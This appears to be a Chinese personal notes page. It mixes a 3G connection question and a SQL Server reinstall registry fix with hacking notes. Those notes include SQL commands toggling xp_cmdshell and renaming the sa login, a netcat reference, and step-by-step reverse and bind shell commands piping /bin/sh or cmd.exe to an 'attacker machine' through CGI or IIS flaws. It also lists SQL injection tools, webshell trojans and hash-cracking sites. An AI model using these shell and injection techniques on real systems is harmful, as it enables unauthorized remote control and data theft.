我的电脑是t400，xp系统。成功安装中国电信3g无线网卡驱动程序和连接程序，却不能上网！（我在其他电脑上，诸如联想天逸f41笔记本能够上网！另外，用无线路由器上网，t400也可以上网，连接速度为54m，说明无线网卡设备没有任何问题）。总之，t400—xp系统不能电信3g上网?

以前装过sql server，后来删掉。现在重装，却出现“以前的某个程序安装已在安装计算机上创建挂起的文件操作。运行安装程序之前必须重新启动计算机”错误。无法进行下去。

参考网上资料，总算搞定。步骤是：

1）添加/删除程序中彻底删除sql server。

2）将没有删除的sql server目录也删除掉。

3）打开注册表编辑器，在hkey_local_machine\system\currentcontrolset\control\session manager中找到pendingfilerenameoperations项目，并删除它。这样就可以清除安装暂挂项目。

4）删除注册表中跟sql server相关的键。

其实估计只要做第3步就可以搞定，这样就可以清除安装暂挂项目。自己是先走了1，2，4，最后做了3才搞定。所以估计3才是最关键的。

删除xp_cmdshell
 
use master
exec sp_dropextendedproc n'xp_cmdshell'
go
-----------------------------------

use master

exec sp_dropextendedproc 'xp_cmdshell'
go

===========================================

恢复xp_cmdshell

use master
exec sp_addextendedproc n 'xp_cmdshell', n'xplog70.dll'
go

===============================================
update sysxlogins set name='lottery' where sid=0x01

nc

想要连接到某处: nc [-options] xxx.xxx.xxx.xxx [ports]
绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
参数:
-e prog -g gateway source-routing hop point[s], up to 8
-g num source-routing pointer: 4, 8, 12, ...
-h 帮助信息
-i secs 延时的间隔
-l 监听模式，用于入站连接
-n 指定数字的ip地址，不能用hostname
-o file 记录16进制的传输
-p port 本地端口号
-r 任意指定本地及远程端口
-s addr 本地源地址
-u udp模式
-v 详细输出——用两个-v可得到更详细的内容
-w secs timeout的时间
-z 将输入输出关掉——用于扫描时

如何用nc建立反向通道

在hacking exposed上讲了两个办法。经过试验是可行的。

方法一：

使用nc创建一个从目标机器到攻击者自己的机器的反向通道。因为从目标机器发起连接，通常防火墙不会阻挡。

攻击者机器：开两个窗口（or 两个终端）机器类型不限

nc -l -n -v -p 80 （该窗口用来输入命令）

nc -l -n -v -p 25 （该窗口用来得到输出）

目标机器：

通过cgi的毛病或者iis的毛病来运行该指令

nc 攻击者机器 80 | /bin/sh | nc 攻击者机器 25

nc 攻击者机器 80 | c:\winnt\system32\cmd.exe | nc 攻击者机器 25 （对于windows nt作为目标的情况）

这个时候从nc监听80的那个窗口输入命令，就可以从监听25那个窗口看到结果了。

没解决的问题：

hacking exposed上说是完全可以用telnet来运行的。也就是上面在目标机器执行的nc都是可以用telnet来取代，它是假设目标机器没有nc这个工具的。实际上我研究不出来。不灵，只能连接一下，马上就断了。

方法二：

目标机器有nc的情况，不过这个nc要有-e参数。windows下的nc.exe默认就是有-e参数。而unix下的默认是没有的。具体原因是要在netcat.c里打开一个已经#define gaping_security_hole选项。不过什么原因我不懂，就直接把sinbad改好的netcat.c发过来好了。

攻击者机器：

nc -l -n -v -p 80

目标机器：

nc -e /bin/sh 攻击者机器 80 （这个时候该窗口将得到交互式的shell）

nc -e c:\winnt\system32\cmd.exe 攻击者机器 80

参数介绍：
nc.exe -h即可看到各参数的使用方法。
基本格式：nc [-options] hostname port[s] [ports] ...
nc -l -p port [options] [hostname] [port]

-d 后台模式
-e prog 程序重定向，一旦连接，就执行 [危险!!]
-g gateway source-routing hop point[s], up to 8
-g num source-routing pointer: 4, 8, 12, ...
-h 帮助信息
-i secs 延时的间隔
-l 监听模式，用于入站连接
-l 连接关闭后,仍然继续监听
-n 指定数字的ip地址，不能用hostname
-o file 记录16进制的传输
-p port 本地端口号
-r 随机本地及远程端口
-s addr 本地源地址
-t 使用telnet交互方式
-u udp模式
-v 详细输出--用两个-v可得到更详细的内容
-w secs timeout的时间
-z 将输入输出关掉--用于扫描时

端口的表示方法可写为m-n的范围格式。

================================================================
基本用法：

大概有以下几种用法：

1)连接到remote主机，例子：
格式：nc -nvv 192.168.x.x 80
讲解：连到192.168.x.x的tcp80端口

2)监听local主机，例子：
格式：nc -l -p 80
讲解：监听本机的tcp80端口

3)扫描远程主机，例子：
格式：nc -nvv -w2 -z 192.168.x.x 80-445
讲解：扫描192.168.x.x的tcp80到tcp445的所有端口

4)remote主机绑定shell，例子：
格式：nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe
讲解：绑定remote主机的cmdshell在remote主机的tcp5354端口

5)remote主机绑定shell并反向连接，例子：
格式：nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354
讲解：绑定remote主机的cmdshell并反向连接到192.168.x.x的tcp5354端口

以上为最基本的几种用法（其实nc的用法还有很多，
当配合管道命令“|”与重定向命令“<”、“>”等等命令功能更强大......）。

==============================================================
高级用法：

6)作攻击程序用，例子：
格式1：type.exe c:exploit.txt|nc -nvv 192.168.x.x 80
格式2：nc -nvv 192.168.x.x 80 < c:exploit.txt
讲解：连接到192.168.x.x的80端口，并在其管道中发送c:exploit.txt的内容(两种格式确有相同的效果，
真是有异曲同工之妙:p)

附：c:exploit.txt为shellcode等

7)作蜜罐用[1]，例子：
格式：nc -l -p 80
讲解：使用-l(注意l是大写)可以不停地监听某一个端口，直到ctrl+c为止

8)作蜜罐用[2]，例子：
格式：nc -l -p 80 > c:log.txt
讲解：使用-l可以不停地监听某一个端口，直到ctrl+c为止，同时把结果输出到c:log.txt中，如果把‘>’
改为‘>>’即可以追加日志

附：c:log.txt为日志等

9)作蜜罐用[3]，例子：
格式1：nc -l -p 80 < c:honeypot.txt
格式2：type.exe c:honeypot.txt|nc -l -p 80
讲解：使用-l可以不停地监听某一个端口，直到ctrl+c为止，并把c:honeypot.txt的内容‘送’入其
管道中

wsockexpert

wis+wed

nbsi2

hdsi

pangolin_bin

casi

asc码逆转换工具

c2c注入格式转换器

sql注入字符转换工具

冰狐浪子

海阳顶端木马

asp站长助手

蓝屏木马

phpsky

黑客之家php木马

ascii转换器

md5crack2

http://www.cmd5.com
http://xmd5.org

sqlinjectencode

sqlinjec encode

小葵多功能转换工具

nc.exe

辅臣数据库浏览器

挖掘机 digshell v6.5

winhex

cookies&injest

cookies&browser

form-bst httppost